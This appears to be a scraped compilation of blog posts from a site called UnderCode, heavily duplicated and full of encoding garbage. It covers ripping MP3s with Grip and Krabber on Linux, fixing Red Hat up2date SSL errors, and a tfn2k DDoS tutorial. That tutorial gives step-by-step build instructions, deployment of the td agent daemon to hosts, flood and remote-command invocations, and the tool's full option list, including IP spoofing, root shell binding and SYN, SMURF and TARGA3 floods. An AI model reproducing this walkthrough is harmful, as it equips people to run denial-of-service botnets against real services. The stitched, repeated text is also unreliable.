β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.
My favorite is Grip written in GTK +.
1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.
2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.
π¦ The following is the URL of some CD ripper / MP3 encoder:
1) CD ripper
Β· cdparanoia
http://www.xiph.org/paranoia
Β· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav
2) MP3 encoder
Β· BladeEnc
http://bladeenc.mp3.no
Β· LAME
http://www.sulaco.org/mp3
Β· gogo
http://homepage1.nifty.com/herumi/gogo_e.html
3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm
4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.
5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.
6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.
7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.
π¦ KDE Department: Krabber
1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.
π¦Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.
My favorite is Grip written in GTK +.
1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.
2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.
π¦ The following is the URL of some CD ripper / MP3 encoder:
1) CD ripper
Β· cdparanoia
http://www.xiph.org/paranoia
Β· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav
2) MP3 encoder
Β· BladeEnc
http://bladeenc.mp3.no
Β· LAME
http://www.sulaco.org/mp3
Β· gogo
http://homepage1.nifty.com/herumi/gogo_e.html
3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm
4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.
5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.
6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.
7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.
π¦ KDE Department: Krabber
1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.
Twitter
UNDERCODE TESTING (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING (@UndercodeNews). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
2) It needs mpg123 to play MP3. Krabber's settings are similar to Grip. Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as / dev / hdc (CDROM drive). One feature of Krabber that Grip does not have is to adjust CPU resources so that you can record MP3s while working. Krabber is relatively easy to use, just follow its four steps:
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm
2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'
3) [user @ localhost user] $ su
Password: (enter root password)
4) [root @ localhost user] # rpm -Fvh up2date- *
5) [root @ localhost user] # up2date -pIf
you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and
enter your username and answer any questions you want to activate your account. The
other versions are the same
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm
2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'
3) [user @ localhost user] $ su
Password: (enter root password)
4) [root @ localhost user] # rpm -Fvh up2date- *
5) [root @ localhost user] # up2date -pIf
you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and
enter your username and answer any questions you want to activate your account. The
other versions are the same
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
γDenial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.
> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.γγ
π¦ First, the TCP syn flood
γγ
1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.
2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.
3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The
> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.
π¦ Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
γDenial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.
> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.γγ
π¦ First, the TCP syn flood
γγ
1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.
2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.
3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The
> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.
π¦ γOf course, there are various methods of DOS attack, such as: UDP flood, ICMP / Ping, ICMP / SMURF ..., the specific principles can be introduced at http://www.chinaitlab.com/www/special/ciwddos.asp Take a look, there are very detailed principles and introduction of commonly used attack software. However, when it comes to DOS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous mixter in Germany (its home page http://mixter.void.ru/papers.html), it seems that it is currently buried What tfn3k, hey , I don't know how many people are sleeping
and eating ... two. Tfn2k attack principle
γγ1) tfn2k attack system.
γγtfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.
γγMaster --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)
γγAgent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The
γγtarget host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)
γ2) tfn2k features.
γγβ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .
γγβ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .
γγafter CAST-256 algorithm plus life, enter a keyword that is when it all compiler β password command. and this password as the only authentication credentials.
γγβ use td process, the master device can execute remote shell command.
γγβ td process The name can be changed at compile time, which makes it easier to hide.
γγβ tfn can compile and run on win32 and linux systems
γγ...
γγAs for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to
send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test
γγ1 ) Test environment:
γγγSoftware: redhat linux 9.0
γγγHardware platform:
γγγγ master:
γγγγγγγ IP: 192.168.0.6
γγγγγγγPIV2.4 / 256 * 2 / rtl8139
γγγγ Ag1:
γγγγγγγ IP: 192.168.0.2
γγγγγγγPIV2.4 / 256 * / rtl8139
γγγγ AG2: IP: 192.168.0.3
γγγγγγγpIV2.6 / 512 * 2 / 3c905
γγγγ AIM: 192.168.0.5
γγγγγγγpIV2.66c / 512 * 2 / 3c905
γγγγ switch: D_link des 1024R
γγ1) Download tfn2k.tgz (Because this software is unusual, I do nβt provide the download address. If you are interested, Find it online)
γγ2) Unzip: tar zxvf tfn2k.tgz
γγ3) Modify the file
γγA. src / Makefile If your system is a linux system, you do nβt need to do any repairs. If it is a win32 system, please
γγγγγ # Linux / * BSD * / Others
γγγγγγCC = gcc
γγγγγγCFLAGS = -Wall -O3
γγγγγγCLIBS =
γγThese lines are commented out, and
γγγγγ # Win32 (cygwin)
γγγγγ #CC = gcc
γγγγγ #CFLAGS = -Wall -DWINDOZE -O2
γγγγγ #CLIBS = Uncomment
γγthese lines. Because my test system is redhat linux 9.0, no changes have been made.
γγB. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.
γγC. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.
γγγγγ/ * struct in_addr
γγγγγγ{
γγγγγγ unsigned long int s_addr;
γγγγγ}; * /
γγNote ~ I put it between "/ * * /", which is commented out :) γγγ
γγD) Change the compiler:
γγbecause tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain
and eating ... two. Tfn2k attack principle
γγ1) tfn2k attack system.
γγtfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.
γγMaster --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)
γγAgent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The
γγtarget host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)
γ2) tfn2k features.
γγβ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .
γγβ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .
γγafter CAST-256 algorithm plus life, enter a keyword that is when it all compiler β password command. and this password as the only authentication credentials.
γγβ use td process, the master device can execute remote shell command.
γγβ td process The name can be changed at compile time, which makes it easier to hide.
γγβ tfn can compile and run on win32 and linux systems
γγ...
γγAs for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to
send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test
γγ1 ) Test environment:
γγγSoftware: redhat linux 9.0
γγγHardware platform:
γγγγ master:
γγγγγγγ IP: 192.168.0.6
γγγγγγγPIV2.4 / 256 * 2 / rtl8139
γγγγ Ag1:
γγγγγγγ IP: 192.168.0.2
γγγγγγγPIV2.4 / 256 * / rtl8139
γγγγ AG2: IP: 192.168.0.3
γγγγγγγpIV2.6 / 512 * 2 / 3c905
γγγγ AIM: 192.168.0.5
γγγγγγγpIV2.66c / 512 * 2 / 3c905
γγγγ switch: D_link des 1024R
γγ1) Download tfn2k.tgz (Because this software is unusual, I do nβt provide the download address. If you are interested, Find it online)
γγ2) Unzip: tar zxvf tfn2k.tgz
γγ3) Modify the file
γγA. src / Makefile If your system is a linux system, you do nβt need to do any repairs. If it is a win32 system, please
γγγγγ # Linux / * BSD * / Others
γγγγγγCC = gcc
γγγγγγCFLAGS = -Wall -O3
γγγγγγCLIBS =
γγThese lines are commented out, and
γγγγγ # Win32 (cygwin)
γγγγγ #CC = gcc
γγγγγ #CFLAGS = -Wall -DWINDOZE -O2
γγγγγ #CLIBS = Uncomment
γγthese lines. Because my test system is redhat linux 9.0, no changes have been made.
γγB. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.
γγC. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.
γγγγγ/ * struct in_addr
γγγγγγ{
γγγγγγ unsigned long int s_addr;
γγγγγ}; * /
γγNote ~ I put it between "/ * * /", which is commented out :) γγγ
γγD) Change the compiler:
γγbecause tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain
s gcc-3.2.2-5, so if you do not replace gcc, tfn2k cannot be compiled. It should be noted that after the change, It will cause the software based on gcc3.2.2 not to compile, please be cautious. The
γγmethod is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /
γγγ cd / mnt / cdrom / Redhat / RPMS
γγγ cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /
γγInstall cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm
γγInstall egcs rpm -Uvh egcs-1.1.2-30.i386.rpm
γγ(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)
γγ4) Compile tfn2k
γγγ cd tfn2k / src
γγγ make
γγfirst will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.
γγAfter compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.
γγ5) Install td.
γγUpload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"
γγ [root @ test /] ftp 192.168.0.2
γγγγγ Connected to 192.168.0.2.
γγγγγ 530 Please login with USER and PASS.
γγγγγ 530 Please login with USER and PASS.
γγγγγ Name (192.168.0.2:root): wjpfjy
γγγγγ 331 Please specify the password.
γγγγγ Password:
γγγγγ 230 Login successful. Have fun.
γγγγγ Remote system type is UNIX.
γγγγγ Using binary mode to transfer files.
γγγγFtp> put td (upload td)
γγγγγlocal: td remote : td
γγγγγ227 Entering Passive Mode (192,168,0,3,198,225)
γγγγγ553 Could not create file.
γγγγftp> by (quit ftp)
γγγγ 221 Goodbye.
γγ [root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
γγγγγγ Root@192.168.0.2's password:
γγγγγγ Last login: Tue Feb 24 06:51:13 2004
γγ [root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
γγ [root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
γγ [root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.
γγ
γγUse the same method to install and run the TFN2k process td on ag2 (192.168.0.3). γγ
γγ6) The attack begins (the tragic memory is being staged ...)
γγReturn to the master (192.168.0.6) and prepare for the exercise. ..
γγγ[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do nβt write down and forget it.)
γγ[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
γγ[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.
γγFirst
γγLet's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory
γγ Protocol: random
γγγγSource IP: random
γγγγClient input:list
γγγγCommand: execute remote command
γγγ Password verification:γγγγ
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.
γγγ Sending out packets: ..
γγGo to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find γγ
γγ[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.
γγmethod is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /
γγγ cd / mnt / cdrom / Redhat / RPMS
γγγ cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /
γγInstall cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm
γγInstall egcs rpm -Uvh egcs-1.1.2-30.i386.rpm
γγ(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)
γγ4) Compile tfn2k
γγγ cd tfn2k / src
γγγ make
γγfirst will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.
γγAfter compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.
γγ5) Install td.
γγUpload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"
γγ [root @ test /] ftp 192.168.0.2
γγγγγ Connected to 192.168.0.2.
γγγγγ 530 Please login with USER and PASS.
γγγγγ 530 Please login with USER and PASS.
γγγγγ Name (192.168.0.2:root): wjpfjy
γγγγγ 331 Please specify the password.
γγγγγ Password:
γγγγγ 230 Login successful. Have fun.
γγγγγ Remote system type is UNIX.
γγγγγ Using binary mode to transfer files.
γγγγFtp> put td (upload td)
γγγγγlocal: td remote : td
γγγγγ227 Entering Passive Mode (192,168,0,3,198,225)
γγγγγ553 Could not create file.
γγγγftp> by (quit ftp)
γγγγ 221 Goodbye.
γγ [root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
γγγγγγ Root@192.168.0.2's password:
γγγγγγ Last login: Tue Feb 24 06:51:13 2004
γγ [root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
γγ [root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
γγ [root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.
γγ
γγUse the same method to install and run the TFN2k process td on ag2 (192.168.0.3). γγ
γγ6) The attack begins (the tragic memory is being staged ...)
γγReturn to the master (192.168.0.6) and prepare for the exercise. ..
γγγ[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do nβt write down and forget it.)
γγ[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
γγ[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.
γγFirst
γγLet's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory
γγ Protocol: random
γγγγSource IP: random
γγγγClient input:list
γγγγCommand: execute remote command
γγγ Password verification:γγγγ
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.
γγγ Sending out packets: ..
γγGo to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find γγ
γγ[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.
[Root @ aim root] # tcpdump -r pack.atta -c 4 -xX
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
γ
γγ[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack
γγγγProtocol: random
γγγγSource IP: random
γγγγClient input: list
γγγγCommand: stop flooding
Password verification:
Sending out packets: ...
γγOf course, there are other attack methods. You can change the attack method by using -c X.
γ [root @ master root ] ./ tfn
γγ usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
γγγγγγγγUses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
γγγγγγγγto use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
γγγγγγγγ1-Change IP antispoof-level (evade rfc2267 filtering)
γγγγγγγγγγusage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
γγγγγγγγ2- Change Packet size, usage: -i
γγγγγγγγ3-Bind root shell to a port, usage: -i
γγγγγγγγ4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
γγγγγγγγ5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
γγγγγγγγ6-ICMP / PING flood, usage: -i victim @ ...
γγγγγγγγ7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
γγγγγγγγ8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
γγγγγγγγ9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
γγγγγγγγ10 - blindly the Execute Remote shell the Command, the Command Usage -i
four defensive approach.
γγLike the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do nβt expect me to guard against DDOS, if I can guard against it, I do nβt have to sleep: (
γγstill the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.
γγAttach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
